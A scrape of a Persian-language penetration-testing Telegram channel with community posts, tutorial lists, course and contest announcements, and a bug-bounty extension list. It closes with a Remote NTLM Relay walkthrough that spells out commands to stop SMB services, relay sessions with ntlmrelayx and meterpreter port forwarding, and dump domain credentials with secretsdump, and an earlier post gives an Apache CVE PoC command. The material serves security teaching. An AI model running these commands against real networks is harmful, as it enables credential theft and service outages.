مردان همه عمـر پاره بردوختهاند
قوتـی به هزار حیله انــدوختهاند
فــردای قیامت به گنـاه ایشـان را
شاید که نسوزند که خود سوختهاند.
سعدی شیرازی
⭕ خانواده بزرگ TryHackBox، حالا ۵۰۰۰ تایی شدیم!
از تک تک شما که از روز اول همراه ما بودید و با حمایت هاتون این جامعه رو ساختید، از صمیم قلب تشکر میکنم.
شما، اعضای پرشور جامعه امنیت سایبری، با اشتیاق و همدلی تون به ما انگیزه دادید تا هر روز بهتر بشیم و محتوای ارزشمندتری در زمینه تست نفوذ و ردتیم با هم به اشتراک بگذاریم.
امیدوارم این خانواده روز به روز بزرگ تر بشه و با هم به قله های جدیدتری در دنیای امنیت سایبری برسیم!
همیشه کنار هم
تیم TryHackBox
قوتـی به هزار حیله انــدوختهاند
فــردای قیامت به گنـاه ایشـان را
شاید که نسوزند که خود سوختهاند.
سعدی شیرازی
⭕ خانواده بزرگ TryHackBox، حالا ۵۰۰۰ تایی شدیم!
از تک تک شما که از روز اول همراه ما بودید و با حمایت هاتون این جامعه رو ساختید، از صمیم قلب تشکر میکنم.
شما، اعضای پرشور جامعه امنیت سایبری، با اشتیاق و همدلی تون به ما انگیزه دادید تا هر روز بهتر بشیم و محتوای ارزشمندتری در زمینه تست نفوذ و ردتیم با هم به اشتراک بگذاریم.
امیدوارم این خانواده روز به روز بزرگ تر بشه و با هم به قله های جدیدتری در دنیای امنیت سایبری برسیم!
همیشه کنار هم
تیم TryHackBox
❤29❤🔥2
🔖 نگاهی به آموزش های قبل :
اینبار درباره ی Adaptive Authentication Explained بخوانید ...
آسیب پذیری تصاحب حساب (Account Takeover) که ...
شناسایی کلاینتها و کوکیها (Client Identification and Cookies)
مقدمه: تست نفوذ چیست؟
بررسی HTTP Headers و شناسایی کاربران
XXE Cheat Sheet (2025 Update)
Active Directory attack Cheat sheet
هوش مصنوعی و امنیت کلاد
شناسایی کاربران با آدرس IP
انواع VLAN
پارت اول دامپ های حافظه LSASS
حملات XXE (تزریق XML) - بخش اول
کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی .
حملات XXE (تزریق XML) - بخش سوم
مقاله اجرای ماکروها از یک فایل DOCX با تزریق قالب از راه دور (Template Injection)
مهندس میلاد کهساری - با محوریت مهندسی معکوس
حملات XXE (تزریق XML) - بخش چهارم (پایانی)
راهکارهای امن VPN و کاربردهای آنها
ابزار Kaveh webdiff Monitor
پارت دوم دامپ های حافظه LSASS
مقاله بایپس کردن SEHOP
تفاوت Encoding، Encryption و Hashing در یک نگاه
راهنمای سریع ابزارهای تحلیل لاگ (Log Parsing Cheat Sheet)
تفاوت بین SSL/TLS VPN و IPsec VPN
درک DACL
اینبار درباره ی Adaptive Authentication Explained بخوانید ...
آسیب پذیری تصاحب حساب (Account Takeover) که ...
شناسایی کلاینتها و کوکیها (Client Identification and Cookies)
مقدمه: تست نفوذ چیست؟
بررسی HTTP Headers و شناسایی کاربران
XXE Cheat Sheet (2025 Update)
Active Directory attack Cheat sheet
هوش مصنوعی و امنیت کلاد
شناسایی کاربران با آدرس IP
انواع VLAN
پارت اول دامپ های حافظه LSASS
حملات XXE (تزریق XML) - بخش اول
کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی .
حملات XXE (تزریق XML) - بخش سوم
مقاله اجرای ماکروها از یک فایل DOCX با تزریق قالب از راه دور (Template Injection)
مهندس میلاد کهساری - با محوریت مهندسی معکوس
حملات XXE (تزریق XML) - بخش چهارم (پایانی)
راهکارهای امن VPN و کاربردهای آنها
ابزار Kaveh webdiff Monitor
پارت دوم دامپ های حافظه LSASS
مقاله بایپس کردن SEHOP
تفاوت Encoding، Encryption و Hashing در یک نگاه
راهنمای سریع ابزارهای تحلیل لاگ (Log Parsing Cheat Sheet)
تفاوت بین SSL/TLS VPN و IPsec VPN
درک DACL
👍5🔥2
🔖 نگاهی به آموزش های قبل ۲ :
۱۰ مورد از خطرناکترین روش حمله به Active Directory
بهکارگیری روشهای OSINT برای آشکارسازی احساسات و مودهای افراد
پارامترهایی که میتوانید تزریق کامند را در آنها امتحان کنید.
شازر
کوکیها (Cookies) چیه و چه کاری انجام میدن؟
کوکیها (Cookies): از شناسایی تا ذخیره اطلاعات
عملگرهای انتساب منطقی در JavaScript
۱۰ آسیب پذیری برتر OWASP
۹ نکته مطالعه OSCP برای کمک به موفقیت شما توسط OffSec
Top 10 Most Dangerous Active Directory Attack Methods
مجموعهای از کوئری های Shodan
موضوع DLLهای مهم ویندوز
۲۷ مورد استفاده از Burp Suite برای پنتسترها
تکنیک های تزریق پروسس در ویندوز
IDOR_&_HTTP_Security_Headers
ابزار ADKAVEH
Public Breach Data of Credentials
بیشتر لذت ببرید با WMI
راهنمای جامع Auto-Elevated Binaries
متن ساده - دادههای اصلی قابل خواندن، بدون محافظت.
شکستن سپر محافظ ویندوز دیفندر با تکنیک تغییر مسیر پوشه (Folder Redirect)
هک کردن SCADA/ICS/OT با استفاده از Shodan Offensive OSINT
۱۰ مورد از خطرناکترین روش حمله به Active Directory
بهکارگیری روشهای OSINT برای آشکارسازی احساسات و مودهای افراد
پارامترهایی که میتوانید تزریق کامند را در آنها امتحان کنید.
شازر
کوکیها (Cookies) چیه و چه کاری انجام میدن؟
کوکیها (Cookies): از شناسایی تا ذخیره اطلاعات
عملگرهای انتساب منطقی در JavaScript
۱۰ آسیب پذیری برتر OWASP
۹ نکته مطالعه OSCP برای کمک به موفقیت شما توسط OffSec
Top 10 Most Dangerous Active Directory Attack Methods
مجموعهای از کوئری های Shodan
موضوع DLLهای مهم ویندوز
۲۷ مورد استفاده از Burp Suite برای پنتسترها
تکنیک های تزریق پروسس در ویندوز
IDOR_&_HTTP_Security_Headers
ابزار ADKAVEH
Public Breach Data of Credentials
بیشتر لذت ببرید با WMI
راهنمای جامع Auto-Elevated Binaries
متن ساده - دادههای اصلی قابل خواندن، بدون محافظت.
شکستن سپر محافظ ویندوز دیفندر با تکنیک تغییر مسیر پوشه (Folder Redirect)
هک کردن SCADA/ICS/OT با استفاده از Shodan Offensive OSINT
👍6
The Definitive Guide to Linux Process Injection THB.pdf
1.5 MB
⭕ راهنمای جامع تزریق پروسس در لینوکس
تکنیک های تزریق پروسس بخش مهمی از ابزارهای یک مهاجم هستند. این تکنیکها به عوامل تهدید امکان میدهند تا کد مخرب را درون یک پروسس قانونی اجرا کنند تا از شناسایی شدن جلوگیری کنند یا قلابهایی (hooks) در پروسس های راه دور قرار دهند تا رفتار آنها را تغییر دهند.
@TryHackBox | Github | YouTube | Group
#Linux #Process #Injection
تکنیک های تزریق پروسس بخش مهمی از ابزارهای یک مهاجم هستند. این تکنیکها به عوامل تهدید امکان میدهند تا کد مخرب را درون یک پروسس قانونی اجرا کنند تا از شناسایی شدن جلوگیری کنند یا قلابهایی (hooks) در پروسس های راه دور قرار دهند تا رفتار آنها را تغییر دهند.
@TryHackBox | Github | YouTube | Group
#Linux #Process #Injection
👍3
⚒️ آزمایش آسیبپذیری آپاچی - اسکریپت پایتون برای آزمایش آسیبپذیریهای سرور HTTP آپاچی
درون PoC برای CVE-2024-38472, CVE-2024-39573, CVE-2024-38477, CVE-2024-38476, CVE-2024-38475, CVE-2024-38474, CVE-2024-38473 и CVE-2023-38709.
GitHub
@TryHackBox
#tools #pentest
درون PoC برای CVE-2024-38472, CVE-2024-39573, CVE-2024-38477, CVE-2024-38476, CVE-2024-38475, CVE-2024-38474, CVE-2024-38473 и CVE-2023-38709.
python3 poc_vulnerability_testing.py --target http://<target-ip>
GitHub
@TryHackBox
#tools #pentest
❤5
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
❤2
Credential Dumping DCSync Attack By Kaveh.pdf
4.1 MB
📖 Credential Dumping DCSync Attack
حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامهها از کنترلکننده دامنه (DC) بهکار میبرند، با این روش که خود را شبیه یک کنترلکننده دامنه نشان میدهند.
راهاندازی یک محیط آزمایشگاهی برای شبیه سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی های کاهش خطر
راهاندازی لاب (Lab Setup)
نیازمندیها:
یک محیط مجازی سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که بهعنوان کنترلکننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترلکننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا بهعنوان کنترلکننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را بهصورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راهاندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox
حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامهها از کنترلکننده دامنه (DC) بهکار میبرند، با این روش که خود را شبیه یک کنترلکننده دامنه نشان میدهند.
راهاندازی یک محیط آزمایشگاهی برای شبیه سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی های کاهش خطر
راهاندازی لاب (Lab Setup)
نیازمندیها:
یک محیط مجازی سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که بهعنوان کنترلکننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترلکننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا بهعنوان کنترلکننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را بهصورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راهاندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox
🔥4❤1
جشن مهرگان یادآور پیروزی عدل و داد بر جور و بیدادگری است و نماد آزادیخواهی در فرهنگ ایرانیان به شمار میآید. ایرانیان در این روز به رهبری کاوه آهنگر بر ضحاک (آژی دهاک) ظالم پیروز شدند و فریدون از دودمان پیشدادی بر تخت شاهی نشست.از این پس،کاوه آهنگر در فرهنگ ایرانی نماد مقاومت و آزادیخواهی،و ضحاک نماد ظلم و ستم محسوب شد.
مهرگان یکی از قدیمیترین جشنهای ایرانی است که در روز دهم مهر ماه برگزار میشود و به پاسداشت ایزد مهر (خدای پیمان،راستی و دوستی)برگزار میگردد.این جشن نمادی از نیکی، دوستی،برداشت محصول و پایان فصل گرما و آغاز پاییز است.آیینهای مهرگان شامل نثارگل، اهدای هدایا،برپایی سفره مهرگانی و اجرای مراسم شادی و مهرورزی است.
مهرگان همچنین نماد برابری و همبستگی اجتماعی است جایی که شاه و رعیت همه با هم به جشن میپرداختند.این جشن در ایران باستان اهمیت ویژهای داشت و در دوران ساسانی نیز با شکوه فراوان برگزار میشد.حتی پس از ورود اسلام، جشن مهرگان در برخی مناطق ایران و میان زرتشتیان ادامه یافته است.
در نهایت،مهرگان فرصتی است برای پاسداشت دوستی،مهرورزی و سپاسگزاری از نعمتهای الهی .
@TryHackBox
مهرگان یکی از قدیمیترین جشنهای ایرانی است که در روز دهم مهر ماه برگزار میشود و به پاسداشت ایزد مهر (خدای پیمان،راستی و دوستی)برگزار میگردد.این جشن نمادی از نیکی، دوستی،برداشت محصول و پایان فصل گرما و آغاز پاییز است.آیینهای مهرگان شامل نثارگل، اهدای هدایا،برپایی سفره مهرگانی و اجرای مراسم شادی و مهرورزی است.
مهرگان همچنین نماد برابری و همبستگی اجتماعی است جایی که شاه و رعیت همه با هم به جشن میپرداختند.این جشن در ایران باستان اهمیت ویژهای داشت و در دوران ساسانی نیز با شکوه فراوان برگزار میشد.حتی پس از ورود اسلام، جشن مهرگان در برخی مناطق ایران و میان زرتشتیان ادامه یافته است.
در نهایت،مهرگان فرصتی است برای پاسداشت دوستی،مهرورزی و سپاسگزاری از نعمتهای الهی .
@TryHackBox
❤12🔥2
Try Hack Box
#جلسه_ششم دوره #رایگان سکوریتی پلاس | Security + بخش : Hashing دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security +
بخش : گواهی های دیجیتال
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
برای دیدن ویدئو روی لینک زیر کلیک کنید :
https://youtu.be/4ZybmjvZSuY
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
بخش : گواهی های دیجیتال
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
برای دیدن ویدئو روی لینک زیر کلیک کنید :
https://youtu.be/4ZybmjvZSuY
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
❤7
Try Hack Box
#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security + بخش : گواهی های دیجیتال دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :
@Unique_exploitbot
@Unique_exploitbot
❤4
واژه نامه امنیت سایبری TryHackBox (1).pdf
2 MB
🔖 واژهنامه امنیت سایبری TryHackBox
مجموعهای کاربردی از مفاهیم، اصطلاحات و واژههای کلیدی دنیای امنیت سایبری، مخصوص علاقهمندان به تست نفوذ، رد تیم و دفاع سایبری.
@TryHackBox | Github | YouTube | Group
مجموعهای کاربردی از مفاهیم، اصطلاحات و واژههای کلیدی دنیای امنیت سایبری، مخصوص علاقهمندان به تست نفوذ، رد تیم و دفاع سایبری.
@TryHackBox | Github | YouTube | Group
👏11🔥4👍3
Browser Extensions For Bug Bounty
🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه
✍️نویسنده
@TryHackBox | The Chaos
🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه
✍️نویسنده
@TryHackBox | The Chaos
❤6👍1
Try Hack Box
Browser Extensions For Bug Bounty 🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه ✍️نویسنده @TryHackBox | The Chaos
🛠 اکستنشن های کمکی برای تست نفوذ و امنیت وب
🔍 شناسایی تکنولوژیها
• Wappalyzer
پروفایلر تکنولوژی - شناسایی CMS، فریمورکها و کتابخانههای جاوااسکریپت
🎯 تست نفوذ و آنالیز
• Hackbar
افزونه تست نفوذ برای Chrome و Firefox
• OWASP Penetration Testing Kit
اسکن امنیتی برنامههای وب (DAST & SCA)
• KNOXSS Community Edition
ابزار کشف XSS
🔒 امنیت و اسکن آسیبپذیری
• Retire.js
اسکن کتابخانههای جاوااسکریپت آسیبپذیر
• Trufflehog
شناسایی خودکار API keys و credentials
• DotGit
تشخیص دایرکتوریهای git در معرض دید
• Bishop Vulnerability Scanner
اسکنر سیستمهای کنترل نسخه و ابزارهای ادمین
🌐 مدیریت درخواستها و هدرها
• FoxyProxy
مدیریت آسان پروکسی سرور
• Modheader
تغییر هدرهای HTTP و URL
• Request Maker
ضبط، تغییر و ارسال درخواستهای HTTP
🔎 جستجو و اوسینت
• Shodan
یافتن اطلاعات هاستینگ و پورتهای باز
• Hunter
یافتن آدرسهای ایمیل در وبسایتها
• Mitaka
جستجوی IP، دامنه، URL و هش از طریق منو راستکلیک
⚡️ ابزارهای کمکی
• Open Multiple URLs
باز کردن چندین URL همزمان
• Cookie-Editor
مدیریت کوکیها برای تب جاری
• S3 Bucket List
ثبت اکسپوز S3 buckets
• d3coder
انکود و دیکد متن (base64, rot13, ...)
✍️نویسنده
@TryHackBox | The Chaos
#BugBounty #Browser #Extension #Tools
🔍 شناسایی تکنولوژیها
• Wappalyzer
پروفایلر تکنولوژی - شناسایی CMS، فریمورکها و کتابخانههای جاوااسکریپت
🎯 تست نفوذ و آنالیز
• Hackbar
افزونه تست نفوذ برای Chrome و Firefox
• OWASP Penetration Testing Kit
اسکن امنیتی برنامههای وب (DAST & SCA)
• KNOXSS Community Edition
ابزار کشف XSS
🔒 امنیت و اسکن آسیبپذیری
• Retire.js
اسکن کتابخانههای جاوااسکریپت آسیبپذیر
• Trufflehog
شناسایی خودکار API keys و credentials
• DotGit
تشخیص دایرکتوریهای git در معرض دید
• Bishop Vulnerability Scanner
اسکنر سیستمهای کنترل نسخه و ابزارهای ادمین
🌐 مدیریت درخواستها و هدرها
• FoxyProxy
مدیریت آسان پروکسی سرور
• Modheader
تغییر هدرهای HTTP و URL
• Request Maker
ضبط، تغییر و ارسال درخواستهای HTTP
🔎 جستجو و اوسینت
• Shodan
یافتن اطلاعات هاستینگ و پورتهای باز
• Hunter
یافتن آدرسهای ایمیل در وبسایتها
• Mitaka
جستجوی IP، دامنه، URL و هش از طریق منو راستکلیک
⚡️ ابزارهای کمکی
• Open Multiple URLs
باز کردن چندین URL همزمان
• Cookie-Editor
مدیریت کوکیها برای تب جاری
• S3 Bucket List
ثبت اکسپوز S3 buckets
• d3coder
انکود و دیکد متن (base64, rot13, ...)
✍️نویسنده
@TryHackBox | The Chaos
#BugBounty #Browser #Extension #Tools
❤10👍6
🚀 آغاز مرحله مقدماتی مسابقه BlueCup
🔵 در مرحله اول این رقابت، شرکتکنندگان با مجموعهای از چالشهای مربوط به شناسایی حملات روبهرو میشن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالشهای فنی برید.
🏆 نفرات برتر این مرحله به دور بعد راه پیدا میکنن و در قالب گروهی رقابت میکنن؛ رقابتها تا فینال ادامه خواهد داشت و در نهایت برترینها در قالبی متفاوت به مصاف هم میرن.
📅 تاریخ برگزاری: جمعه 18 مهر
⏰ زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno
⚡️ نکات مهم:
برای شرکت در مسابقه نیازی به ثبتنام مجدد و پرداخت هزینه نیست.
کاربرانی که هنوز ثبتنام نکردهاند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.
سطح مسابقه: مقدماتی تا متوسط
🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)
🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!
🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno
🔵 در مرحله اول این رقابت، شرکتکنندگان با مجموعهای از چالشهای مربوط به شناسایی حملات روبهرو میشن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالشهای فنی برید.
🏆 نفرات برتر این مرحله به دور بعد راه پیدا میکنن و در قالب گروهی رقابت میکنن؛ رقابتها تا فینال ادامه خواهد داشت و در نهایت برترینها در قالبی متفاوت به مصاف هم میرن.
📅 تاریخ برگزاری: جمعه 18 مهر
⏰ زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno
⚡️ نکات مهم:
برای شرکت در مسابقه نیازی به ثبتنام مجدد و پرداخت هزینه نیست.
کاربرانی که هنوز ثبتنام نکردهاند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.
سطح مسابقه: مقدماتی تا متوسط
🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)
🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!
🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno
❤7
NTLM Relay Attack ?
خیلیها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام میشن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست های Broadcast هست که بعضی پروتکل ها در شبکه های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکهای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو بهدست مییاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
خیلیها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام میشن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست های Broadcast هست که بعضی پروتکل ها در شبکه های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکهای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو بهدست مییاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
🔥5
🔖 اصل قضیه: Remote NTLM Relay
⭕ امروز می خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به خاطر ویژگی های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.
اینجا حرف از Remote NTLM Relay هست: حملهای که با متوقفسازی اجباری سرویس های SMB روی سرور و راهاندازی مجدد اون ها کار میکنه، بهطوری که ترافیک واردشون روی پورت 445 پس از ری استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن های ورودی رو به هر جایی که میخواد رله کنه.
برای exploiting باید چند مرحله ساده رو انجام بدیم.
💢 مرحله 1 > آماده سازی سرور
برای آماده سازی سرور جهت exploiting، باید سرویس های SMB رو غیرفعال و سرور رو ری استارت کنیم. مراحل به صورت کلی اینه:
1. غیرفعالسازی NetLogon:
2. غیرفعال و متوقفکردن SMB Server (LanManServer):
3. توقف کامل LanManWorkstation:
این مراحل توی اسکرین شات اول قابل مشاهدهست.
بعد از غیرفعالسازی سرویسها باید ماشین رو ری استارت کنیم (
پس از بوت شدن مجدد و بهدست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، میتونیم به مرحله بعد بریم.
💢 مرحله 2 > تنظیم ماشین مهاجم
روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده میکنیم. در مثالی که من اجرا کردم، هدف سرور
💢 مرحله 3 > TCP relay با meterpreter
با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت
اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می بینید.
💢 مرحله 4 > Post-exploitation
بعد از اینکه رله موفق باشه،
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامهها و lateral movement در دامنه استفاده کنیم:
چرا این وکتور کمتر رایجه؟
دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:
غیرفعالکردن سرویس های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.
@TryHackBox
#AD #NTLM #Attack
⭕ امروز می خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به خاطر ویژگی های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.
اینجا حرف از Remote NTLM Relay هست: حملهای که با متوقفسازی اجباری سرویس های SMB روی سرور و راهاندازی مجدد اون ها کار میکنه، بهطوری که ترافیک واردشون روی پورت 445 پس از ری استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن های ورودی رو به هر جایی که میخواد رله کنه.
برای exploiting باید چند مرحله ساده رو انجام بدیم.
💢 مرحله 1 > آماده سازی سرور
برای آماده سازی سرور جهت exploiting، باید سرویس های SMB رو غیرفعال و سرور رو ری استارت کنیم. مراحل به صورت کلی اینه:
1. غیرفعالسازی NetLogon:
sc stop netlogon
2. غیرفعال و متوقفکردن SMB Server (LanManServer):
sc stop lanmanserver
sc config lanmanserver start= disabled
3. توقف کامل LanManWorkstation:
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
این مراحل توی اسکرین شات اول قابل مشاهدهست.
بعد از غیرفعالسازی سرویسها باید ماشین رو ری استارت کنیم (
shutdown /r /t 0) خیلی مهمه که دستگاه ری استارت بشه نه اینکه خاموش بشه.پس از بوت شدن مجدد و بهدست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، میتونیم به مرحله بعد بریم.
💢 مرحله 2 > تنظیم ماشین مهاجم
روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده میکنیم. در مثالی که من اجرا کردم، هدف سرور
10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090
💢 مرحله 3 > TCP relay با meterpreter
با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت
445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام میده) فوروارد/ریدایرکت می کنیم. مثال دستور:portfwd add -R -L 10.51.124.39 -l 445 -p 445
اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می بینید.
💢 مرحله 4 > Post-exploitation
بعد از اینکه رله موفق باشه،
ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامهها و lateral movement در دامنه استفاده کنیم:
proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30
چرا این وکتور کمتر رایجه؟
دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:
